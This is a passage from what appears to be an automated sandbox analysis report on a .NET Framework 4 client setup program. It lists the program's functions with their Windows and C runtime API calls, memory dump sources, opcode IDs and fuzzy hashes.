                                                                                                                                                                    • Instruction ID: 598ca6e417bf72324438b9af9c2cb9bed7c7fa324ca6aaa05acb08394d7c2fce
                                                                                                                                                                    • Opcode Fuzzy Hash: 03296a67499aa7a0b2c5aad6268a5807e9f771368e05952f1dd8ba63c755d488
                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0DF33904129BFAB254F81EC0AEEB3F9DEF043B0B108129FA18C6010E676DD5087E0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000336FF Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 0003370B
                                                                                                                                                                      • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
                                                                                                                                                                      • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
                                                                                                                                                                      • Part of subcall function 000336DB: __getptd_noexit.LIBCMT ref: 000336E0
                                                                                                                                                                      • Part of subcall function 000336DB: __freeptd.LIBCMT ref: 000336EA
                                                                                                                                                                      • Part of subcall function 000336DB: ExitThread.KERNEL32 ref: 000336F3
                                                                                                                                                                    • __XcptFilter.LIBCMT ref: 0003372C
                                                                                                                                                                      • Part of subcall function 00029D0A: __getptd_noexit.LIBCMT ref: 00029D10
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 418257734-0
                                                                                                                                                                    • Opcode ID: 87d68b3f2282d5150478a001f7dde73e0b6a3b52de3c4ff240abb66c72e21a21
                                                                                                                                                                    • Instruction ID: 584eeae82cb5a1f601d6288aa774154782d5e01475f0ce6e999be886ebe65ec3
                                                                                                                                                                    • Opcode Fuzzy Hash: 87d68b3f2282d5150478a001f7dde73e0b6a3b52de3c4ff240abb66c72e21a21
                                                                                                                                                                    • Instruction Fuzzy Hash: C1E0ECB1A44604AFE718BBA0D94AEAD7779AF45311F204089F1025B2A3CF759940EA21
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00027E1E Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,0002809D,00000000,00025279,?,?,?,00000000,00028585,?,00000000,?,?,000000CC,00020145), ref: 00027E25
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00027E2F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1687624791-0
                                                                                                                                                                    • Opcode ID: 990ab0ce616a730d5b4cea752463308b40cabdd1ebac3bffd29fed9a3ec1d302
                                                                                                                                                                    • Instruction ID: 6c6231ce6aac757c1ea666038c971cade120933c62beaa4b146be8d8446e2de5
                                                                                                                                                                    • Opcode Fuzzy Hash: 990ab0ce616a730d5b4cea752463308b40cabdd1ebac3bffd29fed9a3ec1d302
                                                                                                                                                                    • Instruction Fuzzy Hash: 90D0C9707142124BEFB01F31A9087A232E8AF18742F1648E9A59AC2000EB64C8809660
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001B26E Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0001B278
                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 0001B27F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                    • Opcode ID: b87040fe17a49bc81f0048967baba56812fd550ebe3a197b943eca20bf72cc4e
                                                                                                                                                                    • Instruction ID: 3fa362e10ca8d1fae9f1aa8f497b5985ad5f77986232c5508fee1c89aeaf79a1
                                                                                                                                                                    • Opcode Fuzzy Hash: b87040fe17a49bc81f0048967baba56812fd550ebe3a197b943eca20bf72cc4e
                                                                                                                                                                    • Instruction Fuzzy Hash: D1C0123214420877EB501BE1AC0CFE93B9C9B84B52F444000F70985050D63584909691
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001B250 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0001B25A
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0001B261
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                                    • Opcode ID: 9d0e39dafaafa8f4ba28b61b2f3c50846912809e09a43aabcc5c61e25445b72f
                                                                                                                                                                    • Instruction ID: 86d61d8e9d992b0275c147053c094a95398906d85638d6b0e351f2b27e5ca5dd
                                                                                                                                                                    • Opcode Fuzzy Hash: 9d0e39dafaafa8f4ba28b61b2f3c50846912809e09a43aabcc5c61e25445b72f
                                                                                                                                                                    • Instruction Fuzzy Hash: A4C09B36044248B7DF041BD1EC0DFC57F1DD789752F00C000F71D86051CA7594108751
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001D716 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 0001D71D
                                                                                                                                                                      • Part of subcall function 000218BD: __EH_prolog3_catch.LIBCMT ref: 000218C4
                                                                                                                                                                      • Part of subcall function 0001DBF8: __EH_prolog3.LIBCMT ref: 0001DBFF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1956504941-0
                                                                                                                                                                    • Opcode ID: a87da67bbd79d46ed4d3d72cbc380ee289cf7baa4074a5da54a4e5c746260be2
                                                                                                                                                                    • Instruction ID: 8cd51781bad8c78dc31e795a5758b441f149c1d35cfc82a1c8e2f1daa17c8c3c
                                                                                                                                                                    • Opcode Fuzzy Hash: a87da67bbd79d46ed4d3d72cbc380ee289cf7baa4074a5da54a4e5c746260be2
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D510774904358DFDB01DFA8C988ADDBBF9AF45304F284099E849AF242DB75DE41CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001AC67 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • #20.CABINET(0001B250,0001B26E,0001B296,0001B32B,0001B390,0001B48E,0001B3F5,000000FF,?,?,00000000,00000000), ref: 0001AD40
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d481662dffe5b3166140d0f153cce4498dd6c21d17230c978896b00b4b7e3eaf
                                                                                                                                                                    • Instruction ID: 1bcd90daaa87b51e000189fd4ada251215925fd2b853a1d52eda4a3bf2462201
                                                                                                                                                                    • Opcode Fuzzy Hash: d481662dffe5b3166140d0f153cce4498dd6c21d17230c978896b00b4b7e3eaf
                                                                                                                                                                    • Instruction Fuzzy Hash: CE417F70E01619EFDB51DFA9D8418EEBBF4EB4A710F10402AE515F7250D7789981CF91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000287CE Relevance: 1.6, APIs: 1, Instructions: 113synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000285CB: __EH_prolog3.LIBCMT ref: 000285D2
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 00028879
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3ObjectSingleWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2100491740-0
                                                                                                                                                                    • Opcode ID: 088470d06dbb2cfe6c7f0d2b4a7bdd2be99876d3c10849b6148b6e06ee91570c
                                                                                                                                                                    • Instruction ID: 8c9b087453e8135666fc0c5f131a4dce6784ae2244e0358fa2784c2f2c43a1b9
                                                                                                                                                                    • Opcode Fuzzy Hash: 088470d06dbb2cfe6c7f0d2b4a7bdd2be99876d3c10849b6148b6e06ee91570c
                                                                                                                                                                    • Instruction Fuzzy Hash: 9E415F3A6011358BCFA5DE28E8C1BA933E1BF48744B55C164EC65EF267DF20EC418B91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00025453 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 4a66dce934c466b5d717cb95ad4e394bdcaa7d7e9b91693fb2118bff2b38c20a
                                                                                                                                                                    • Instruction ID: 3728ab476a04156bbb4d2bc91359035474b7d728344cee93cf3e57ab7738ba37
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a66dce934c466b5d717cb95ad4e394bdcaa7d7e9b91693fb2118bff2b38c20a
                                                                                                                                                                    • Instruction Fuzzy Hash: F7315E70900A65DFCF15CF68D884AAABBF1BF09321F254694D854AB292C334ED41CF94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001C49D Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0001C518
                                                                                                                                                                      • Part of subcall function 000335E6: _malloc.LIBCMT ref: 00033600
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3476970888-0
                                                                                                                                                                    • Opcode ID: d6d5358cf8190076e07cea7f1ae412693a409a0f6fea124d0b7d44bcab83d5e7
                                                                                                                                                                    • Instruction ID: 8c337105608756e373c971ed2589abbcce94f1111130e23c169c9b5f1420985d
                                                                                                                                                                    • Opcode Fuzzy Hash: d6d5358cf8190076e07cea7f1ae412693a409a0f6fea124d0b7d44bcab83d5e7
                                                                                                                                                                    • Instruction Fuzzy Hash: 47019271144A01AFD735DF6DD582DAAB3E9EF44750B20882DE097C3662EB71F980C710
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00031603 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0002DC3A,?,?,00000000,00000000,00000000,?,0002A700,00000001,00000214,?,0002DBEB), ref: 00031646
                                                                                                                                                                      • Part of subcall function 0002B059: __getptd_noexit.LIBCMT ref: 0002B059
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                                    • Opcode ID: c33a20e9fdc1621866d4596874b8cb2fe9e5f045b8fba4e0565bbc32c00537df
                                                                                                                                                                    • Instruction ID: 61db88424808a870e35e9a742ac00fefd8c0c8532ee8665f2b90270044080cbd
                                                                                                                                                                    • Opcode Fuzzy Hash: c33a20e9fdc1621866d4596874b8cb2fe9e5f045b8fba4e0565bbc32c00537df
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B01D4352012159BEB7A9FA5DC16BEA33DCBB89364F09852AE916CB1E0DB74DD00C640
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00022D7D Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00022DBF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2005118841-0
                                                                                                                                                                    • Opcode ID: e8759f7d600f073e6f237c14c9f00afbbc06f7433c7b9c40783746f8c5f75420
                                                                                                                                                                    • Instruction ID: de53e3d863fc3eaf0c3b6c1a3110e8cee56d1e9aea2560647db108542fda19f0
                                                                                                                                                                    • Opcode Fuzzy Hash: e8759f7d600f073e6f237c14c9f00afbbc06f7433c7b9c40783746f8c5f75420
                                                                                                                                                                    • Instruction Fuzzy Hash: 12017C71600706AFCB28CFB9C805D5BBBF8EF85754B048A5DA486D7641D770FA45CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00019CA3 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00015AE3,?,00000000,?,00000000,?,?,?,0001843A,?,40000000,00000005), ref: 00019CD2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    • Opcode ID: feaee3f30c5549015e115d430b7ab4f54e2f02582e44a988329e7dbd74fc116b
                                                                                                                                                                    • Instruction ID: 0b5483019340a48e78534ccc36ada6a573d7520c8018ae147734a26c239c593e
                                                                                                                                                                    • Opcode Fuzzy Hash: feaee3f30c5549015e115d430b7ab4f54e2f02582e44a988329e7dbd74fc116b
                                                                                                                                                                    • Instruction Fuzzy Hash: 3EF09032801128FFCF129F98CE858DE7EA5EF04364F104125BE1126161D7719E90E7E0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0002388C Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 6baef478c16dbe6f6a87d85877485089ebc531c3334fb533ec2aee888d2954d4
                                                                                                                                                                    • Instruction ID: 4fe1d8dda7149646b6fa9f545ff8c1c450ca16be7dd054d8958437bb7b7a2f10
                                                                                                                                                                    • Opcode Fuzzy Hash: 6baef478c16dbe6f6a87d85877485089ebc531c3334fb533ec2aee888d2954d4
                                                                                                                                                                    • Instruction Fuzzy Hash: C0012C71100A06EFC711DF24E909699FBF9BF40316F108618E0199F6A1DBB8E994CF91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00025293 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 0a78b40938937ee848da36a871b19fcfc27b72be61fa20b7074ac9257cfbb530
                                                                                                                                                                    • Instruction ID: f5fc9d8a2efdae544bf00802fc1f62e4d68e17453e318620de6087a12f6378e7
                                                                                                                                                                    • Opcode Fuzzy Hash: 0a78b40938937ee848da36a871b19fcfc27b72be61fa20b7074ac9257cfbb530
                                                                                                                                                                    • Instruction Fuzzy Hash: 06014B304016A5EFD722EFA4D1057DEB7B4BF25300F14458CE8865B282CB35AA48CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00022F92 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00022FD6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2005118841-0
